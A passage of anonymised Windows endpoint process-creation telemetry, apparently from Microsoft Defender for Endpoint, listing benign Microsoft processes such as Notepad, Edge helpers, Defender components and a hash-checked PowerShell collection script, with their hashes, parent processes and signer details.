+200,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:38:26.110910200+00:00,4252,notepad.exe,"""NOTEPAD.EXE"" C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\BP.txt",PortableExecutable,2021-02-17 04:36:07.976241100+00:00,C:\Windows\System32\notepad.exe,202240,423d3ade2f14572c5bd5f546973eb493,a1dfbac053d9f93dc80792388d210a13b2f9fb69c15dacbf59e9043ea4e8afaf,a1f446d0c29913d3f863ba164efe86b6e9e5e7ff,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:38:26.152441800+00:00,2021-06-25 01:39:54.750934400+00:00,7a4eda42-1a2d-4b90-869b-a720fe2f70d8,computerpii_0a470890c60768167990033d701e7bd881398861,183625,False,10.7740.19041.1052,False,11540474045178163,,11540474045178803,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Notepad,NOTEPAD.EXE,Notepad
+201,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:39:38.242083700+00:00,12956,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7520 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:39:39.248310700+00:00,2021-06-25 01:39:54.757393500+00:00,07d1bd21-c919-4cd9-8ae4-42b64f4a3b19,computerpii_0a470890c60768167990033d701e7bd881398861,183770,False,10.7740.19041.1052,False,11540474045178212,,11540474045178811,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+202,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:31:13.752268800+00:00,20248,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""5052"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:31:14.649130600+00:00,2021-06-24 03:31:57.122106+00:00,c5f0a3f1-102e-4509-8a6b-9067aa34c2aa,computerpii_0a470890c60768167990033d701e7bd881398861,174538,False,10.7740.19041.1052,False,11540474045137006,,11540474045176294,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+203,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:31:23.883550200+00:00,12336,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e965149089e1d7fd34d4a11123f303c57bfdb97776adf94f77fa41a92be2d85c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 03:31:13.752268800+00:00,20248,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""5052"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:31:24.170664700+00:00,2021-06-24 03:31:57.122287800+00:00,a102d11c-3a1c-4254-8b44-df981bdb92ff,computerpii_0a470890c60768167990033d701e7bd881398861,174542,False,10.7740.19041.1052,False,11540474045176294,,11540474045176296,2021-06-24 03:31:13.752268800+00:00,20248,2021-06-24 03:31:13.752268800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,20248,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+204,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:31:23.937026+00:00,1320,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:31:23.883550200+00:00,12336,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e965149089e1d7fd34d4a11123f303c57bfdb97776adf94f77fa41a92be2d85c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",True,2021-06-24 03:31:13.752268800+00:00,20248,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:31:24.170945400+00:00,2021-06-24 03:31:57.122330900+00:00,59759705-3cf2-4353-9ece-d465bac0fac1,computerpii_0a470890c60768167990033d701e7bd881398861,174543,False,10.7740.19041.1052,False,11540474045176296,,11540474045176297,2021-06-24 03:31:23.883550200+00:00,12336,2021-06-24 03:31:23.883550200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,12336,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+205,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:31:27.118920900+00:00,2764,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\l525t0q4.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:31:23.883550200+00:00,12336,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'e965149089e1d7fd34d4a11123f303c57bfdb97776adf94f77fa41a92be2d85c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_cd56dc5f0d3306922ff497eb4f9fc3fd655f151e.ps1' }""",True,2021-06-24 03:31:13.752268800+00:00,20248,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:31:27.209996900+00:00,2021-06-24 03:31:57.123355700+00:00,71f9507b-4a6a-4138-a0b4-70ce836d2c30,computerpii_0a470890c60768167990033d701e7bd881398861,174564,False,10.7740.19041.1052,False,11540474045176296,,11540474045176298,2021-06-24 03:31:23.883550200+00:00,12336,2021-06-24 03:31:23.883550200+00:00,powershell.exe,12336,16640,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+206,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:31:27.201867300+00:00,16408,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_f54fce5aac4c9d2058334106a412f4c19b1a815b.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_d7d60087fe20bbac70ea51d2a286680373e354a1.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:31:27.118920900+00:00,2764,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\l525t0q4.cmdline""",True,2021-06-24 03:31:23.883550200+00:00,12336,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:31:27.212536400+00:00,2021-06-24 03:31:57.123404100+00:00,4d98eace-f5f8-4690-97aa-ea5ce6b33585,computerpii_0a470890c60768167990033d701e7bd881398861,174565,False,10.7740.19041.1052,False,11540474045176298,,11540474045176299,2021-06-24 03:31:27.118920900+00:00,2764,2021-06-24 03:31:27.118920900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2764,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 03:31:27.121695400+00:00,2019-12-07 09:10:35.992536100+00:00,16640,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+207,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:14:57.198777400+00:00,6980,SenseCncProxy.exe,3668,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:14:57.925682300+00:00,2021-06-24 01:17:04.713306900+00:00,706c25c2-d746-446e-999c-e0e6ce1bb6f4,computerpii_0a470890c60768167990033d701e7bd881398861,170288,False,10.7740.19041.1052,False,11540474045137006,,11540474045175548,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+208,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:16:48.974675900+00:00,13008,SenseCncProxy.exe,4620,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:16:48.995641800+00:00,2021-06-24 01:17:04.715536900+00:00,b8dcd993-edbe-413d-85d1-1c9910503426,computerpii_0a470890c60768167990033d701e7bd881398861,170338,False,10.7740.19041.1052,False,11540474045137006,,11540474045175554,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+209,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:16:49.882761700+00:00,3160,SgrmLpac.exe,SgrmLpac.exe,PortableExecutable,2020-10-09 20:47:52.796409800+00:00,C:\Windows\System32\SgrmLpac.exe,57144,7e4f5ee531a80e80b2ab7cc2f5621eec,249b9a3a875af413328bc559620fec131a0db707cb6b46001c752adcf3e043df,9019dfd840c8ab98469a401f58ed752f42191ea9,3ba1a18a0dc30a0545e7765cb97d8e63,f9cbf1ff87d6f11920c4b7367ea2178bf13aa276c65d918950683983f268bc1f,9b39f815ca4416bff574d01c90d03d2df2a0bdd7,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:22.466683200+00:00,7904,SgrmBroker.exe,SgrmBroker.exe,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:16:50.324509100+00:00,2021-06-24 01:17:04.715689500+00:00,cf671f1d-3858-4178-97da-28f5922d9ee8,computerpii_0a470890c60768167990033d701e7bd881398861,170342,False,10.7740.19041.1052,False,11540474045137039,,11540474045175555,2021-06-10 00:46:22.466683200+00:00,7904,2021-06-10 00:46:22.466683200+00:00,\Device\HarddiskVolume3\Windows\System32\SgrmBroker.exe,7904,128,ActiveProcessStartkey,C:\Windows\System32,329504,2092-04-28 08:19:05+00:00,2020-10-09 20:47:52.796409800+00:00,2021-06-10 00:46:22.468696900+00:00,2020-10-09 20:47:52.796409800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,SgrmBroker,SgrmBroker.exe,System Guard Runtime Monitor Broker Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,SgrmLpac,SgrmLpac.exe,System Guard Runtime Monitor LPAC
+210,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:16:53.890600300+00:00,16252,SenseCncProxy.exe,4696,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:16:54.342274400+00:00,2021-06-24 01:17:04.715988100+00:00,0cacd568-cf3d-40bf-bbed-35c78fee0d78,computerpii_0a470890c60768167990033d701e7bd881398861,170350,False,10.7740.19041.1052,False,11540474045137006,,11540474045175556,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service 